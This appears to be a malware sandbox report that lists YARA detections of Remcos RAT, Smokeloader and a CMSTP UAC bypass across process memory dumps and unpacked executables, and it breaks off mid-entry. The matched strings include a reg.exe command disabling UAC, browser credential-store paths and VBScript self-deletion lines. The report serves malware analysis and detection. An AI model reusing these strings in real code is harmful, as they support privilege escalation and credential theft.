00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b90f:$a1: Remcos restarted by watchdog! 0x6be87:$a3: %02i:%02i:%02i:%03i
00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b90f:$a1: Remcos restarted by watchdog! 0x6be87:$a3: %02i:%02i:%02i:%03i
00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: ltlbVjClX9.exe PID: 6464	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: ltlbVjClX9.exe PID: 6464	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: ltlbVjClX9.exe PID: 6464	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xc592:$a1: Remcos restarted by watchdog! 0x1bf02:$a1: Remcos restarted by watchdog! 0x341c1:$a1: Remcos restarted by watchdog! 0xcaec:$a3: %02i:%02i:%02i:%03i 0xcf1b:$a3: %02i:%02i:%02i:%03i 0x1c45c:$a3: %02i:%02i:%02i:%03i 0x1c88b:$a3: %02i:%02i:%02i:%03i 0x3471b:$a3: %02i:%02i:%02i:%03i 0x34b4a:$a3: %02i:%02i:%02i:%03i
Process Memory Space: yavascript.exe PID: 2604	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: yavascript.exe PID: 2604	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: yavascript.exe PID: 2604	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x86c2:$a1: Remcos restarted by watchdog! 0x14aa0:$a1: Remcos restarted by watchdog! 0x22616:$a1: Remcos restarted by watchdog! 0x8c1c:$a3: %02i:%02i:%02i:%03i 0x904b:$a3: %02i:%02i:%02i:%03i 0x14ffa:$a3: %02i:%02i:%02i:%03i 0x15429:$a3: %02i:%02i:%02i:%03i 0x22b70:$a3: %02i:%02i:%02i:%03i 0x22f9f:$a3: %02i:%02i:%02i:%03i
Process Memory Space: yavascript.exe PID: 5020	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: yavascript.exe PID: 5020	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: yavascript.exe PID: 5020	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xd87e:$a1: Remcos restarted by watchdog! 0x23862:$a1: Remcos restarted by watchdog! 0x30698:$a1: Remcos restarted by watchdog! 0xddd8:$a3: %02i:%02i:%02i:%03i 0xe207:$a3: %02i:%02i:%02i:%03i 0x23dbc:$a3: %02i:%02i:%02i:%03i 0x241eb:$a3: %02i:%02i:%02i:%03i 0x30bf2:$a3: %02i:%02i:%02i:%03i 0x31021:$a3: %02i:%02i:%02i:%03i
Process Memory Space: yavascript.exe PID: 6772	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: yavascript.exe PID: 6772	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: yavascript.exe PID: 6772	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x12376:$a1: Remcos restarted by watchdog! 0x24038:$a1: Remcos restarted by watchdog! 0x304e3:$a1: Remcos restarted by watchdog! 0x128d0:$a3: %02i:%02i:%02i:%03i 0x12cff:$a3: %02i:%02i:%02i:%03i 0x24592:$a3: %02i:%02i:%02i:%03i 0x249c1:$a3: %02i:%02i:%02i:%03i 0x30a3d:$a3: %02i:%02i:%02i:%03i 0x30e6c:$a3: %02i:%02i:%02i:%03i
Click to see the 71 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.ltlbVjClX9.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.ltlbVjClX9.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.ltlbVjClX9.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6a8:$a1: Remcos restarted by watchdog! 0x6bc20:$a3: %02i:%02i:%02i:%03i
0.2.ltlbVjClX9.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x656fc:$str_a1: C:\Windows\System32\cmd.exe 0x65678:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65678:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65b78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x663a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6576c:$str_b2: Executing file: 0x667ec:$str_b3: GetDirectListeningPort 0x66198:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66318:$str_b7: \update.vbs 0x65794:$str_b9: Downloaded file: 0x65780:$str_b10: Downloading file: 0x65824:$str_b12: Failed to upload file: 0x667b4:$str_b13: StartForward 0x667d4:$str_b14: StopForward 0x66270:$str_b15: fso.DeleteFile " 0x66204:$str_b16: On Error Resume Next 0x662a0:$str_b17: fso.DeleteFolder " 0x65814:$str_b18: Uploaded file: 0x657d4:$str_b19: Unable to delete: 0x66238:$str_b20: while fso.FileExists(" 0x65cb1:$str_c0: [Firefox StoredLogins not found]
0.2.ltlbVjClX9.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x655e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6557c:$s1: CoGetObject 0x65590:$s1: CoGetObject 0x655ac:$s1: CoGetObject 0x6f538:$s1: CoGetObject 0x6553c:$s2: Elevation:Administrator!new:
15.3.yavascript.exe.2180000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.3.yavascript.exe.2180000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.3.yavascript.exe.2180000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69ca8:$a1: Remcos restarted by watchdog! 0x6a220:$a3: %02i:%02i:%02i:%03i
15.3.yavascript.exe.2180000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x63cfc:$str_a1: C:\Windows\System32\cmd.exe 0x63c78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63c78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64178:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x649a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x63d6c:$str_b2: Executing file: 0x64dec:$str_b3: GetDirectListeningPort 0x64798:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x64918:$str_b7: \update.vbs 0x63d94:$str_b9: Downloaded file: 0x63d80:$str_b10: Downloading file: 0x63e24:$str_b12: Failed to upload file: 0x64db4:$str_b13: StartForward 0x64dd4:$str_b14: StopForward 0x64870:$str_b15: fso.DeleteFile " 0x64804:$str_b16: On Error Resume Next 0x648a0:$str_b17: fso.DeleteFolder " 0x63e14:$str_b18: Uploaded file: 0x63dd4:$str_b19: Unable to delete: 0x64838:$str_b20: while fso.FileExists(" 0x642b1:$str_c0: [Firefox StoredLogins not found]
15.3.yavascript.exe.2180000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x63be8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x63b7c:$s1: CoGetObject 0x63b90:$s1: CoGetObject 0x63bac:$s1: CoGetObject 0x6db38:$s1: CoGetObject 0x63b3c:$s2: Elevation:Administrator!new:
26.2.yavascript.exe.730e67.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.2.yavascript.exe.730e67.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
26.2.yavascript.exe.730e67.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69ca8:$a1: Remcos restarted by watchdog! 0x6a220:$a3: %02i:%02i:%02i:%03i
26.2.yavascript.exe.730e67.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x63cfc:$str_a1: C:\Windows\System32\cmd.exe 0x63c78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63c78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64178:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x649a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x63d6c:$str_b2: Executing file: 0x64dec:$str_b3: GetDirectListeningPort 0x64798:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x64918:$str_b7: \update.vbs 0x63d94:$str_b9: Downloaded file: 0x63d80:$str_b10: Downloading file: 0x63e24:$str_b12: Failed to upload file: 0x64db4:$str_b13: StartForward 0x64dd4:$str_b14: StopForward 0x64870:$str_b15: fso.DeleteFile " 0x64804:$str_b16: On Error Resume Next 0x648a0:$str_b17: fso.DeleteFolder " 0x63e14:$str_b18: Uploaded file: 0x63dd4:$str_b19: Unable to delete: 0x64838:$str_b20: while fso.FileExists(" 0x642b1:$str_c0: [Firefox StoredLogins not found]
26.2.yavascript.exe.730e67.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x63be8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x63b7c:$s1: CoGetObject 0x63b90:$s1: CoGetObject 0x63bac:$s1: CoGetObject 0x6db38:$s1: CoGetObject 0x63b3c:$s2: Elevation:Administrator!new:
15.2.yavascript.exe.730e67.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.yavascript.exe.730e67.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.yavascript.exe.730e67.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
15.2.yavascript.exe.730e67.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
15.2.yavascript.exe.730e67.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
20.3.yavascript.exe.2000000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
20.3.yavascript.exe.2000000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.3.yavascript.exe.2000000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
20.3.yavascript.exe.2000000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
20.3.yavascript.exe.2000000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
0.2.ltlbVjClX9.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.ltlbVjClX9.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.ltlbVjClX9.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
0.2.ltlbVjClX9.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0.2.ltlbVjClX9.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
20.2.yavascript.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
20.2.yavascript.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.yavascript.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
20.2.yavascript.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
20.2.yavascript.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
26.2.yavascript.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.2.yavascript.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.yavascript.exe.1f80e67.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
20.2.yavascript.exe.1f80e67.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
26.2.yavascript.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
20.2.yavascript.exe.1f80e67.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69ca8:$a1: Remcos restarted by watchdog! 0x6a220:$a3: %02i:%02i:%02i:%03i
26.2.yavascript.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
20.2.yavascript.exe.1f80e67.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x63cfc:$str_a1: C:\Windows\System32\cmd.exe 0x63c78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63c78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64178:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x649a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x63d6c:$str_b2: Executing file: 0x64dec:$str_b3: GetDirectListeningPort 0x64798:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x64918:$str_b7: \update.vbs 0x63d94:$str_b9: Downloaded file: 0x63d80:$str_b10: Downloading file: 0x63e24:$str_b12: Failed to upload file: 0x64db4:$str_b13: StartForward 0x64dd4:$str_b14: StopForward 0x64870:$str_b15: fso.DeleteFile " 0x64804:$str_b16: On Error Resume Next 0x648a0:$str_b17: fso.DeleteFolder " 0x63e14:$str_b18: Uploaded file: 0x63dd4:$str_b19: Unable to delete: 0x64838:$str_b20: while fso.FileExists(" 0x642b1:$str_c0: [Firefox StoredLogins not found]
20.2.yavascript.exe.1f80e67.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x63be8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x63b7c:$s1: CoGetObject 0x63b90:$s1: CoGetObject 0x63bac:$s1: CoGetObject 0x6db38:$s1: CoGetObject 0x63b3c:$s2: Elevation:Administrator!new:
26.2.yavascript.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
15.2.yavascript.exe.730e67.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.yavascript.exe.730e67.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.yavascript.exe.730e67.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69ca8:$a1: Remcos restarted by watchdog! 0x6a220:$a3: %02i:%02i:%02i:%03i
15.2.yavascript.exe.730e67.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x63cfc:$str_a1: C:\Windows\System32\cmd.exe 0x63c78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63c78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64178:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x649a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x63d6c:$str_b2: Executing file: 0x64dec:$str_b3: GetDirectListeningPort 0x64798:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x64918:$str_b7: \update.vbs 0x63d94:$str_b9: Downloaded file: 0x63d80:$str_b10: Downloading file: 0x63e24:$str_b12: Failed to upload file: 0x64db4:$str_b13: StartForward 0x64dd4:$str_b14: StopForward 0x64870:$str_b15: fso.DeleteFile " 0x64804:$str_b16: On Error Resume Next 0x648a0:$str_b17: fso.DeleteFolder " 0x63e14:$str_b18: Uploaded file: 0x63dd4:$str_b19: Unable to delete: 0x64838:$str_b20: while fso.FileExists(" 0x642b1:$str_c0: [Firefox StoredLogins not found]
20.3.yavascript.exe.2000000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
20.3.yavascript.exe.2000000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.yavascript.exe.730e67.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x63be8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x63b7c:$s1: CoGetObject 0x63b90:$s1: CoGetObject 0x63bac:$s1: CoGetObject 0x6db38:$s1: CoGetObject 0x63b3c:$s2: Elevation:Administrator!new:
20.3.yavascript.exe.2000000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69ca8:$a1: Remcos restarted by watchdog! 0x6a220:$a3: %02i:%02i:%02i:%03i
20.3.yavascript.exe.2000000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x63cfc:$str_a1: C:\Windows\System32\cmd.exe 0x63c78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63c78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64178:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x649a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x63d6c:$str_b2: Executing file: 0x64dec:$str_b3: GetDirectListeningPort 0x64798:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x64918:$str_b7: \update.vbs 0x63d94:$str_b9: Downloaded file: 0x63d80:$str_b10: Downloading file: 0x63e24:$str_b12: Failed to upload file: 0x64db4:$str_b13: StartForward 0x64dd4:$str_b14: StopForward 0x64870:$str_b15: fso.DeleteFile " 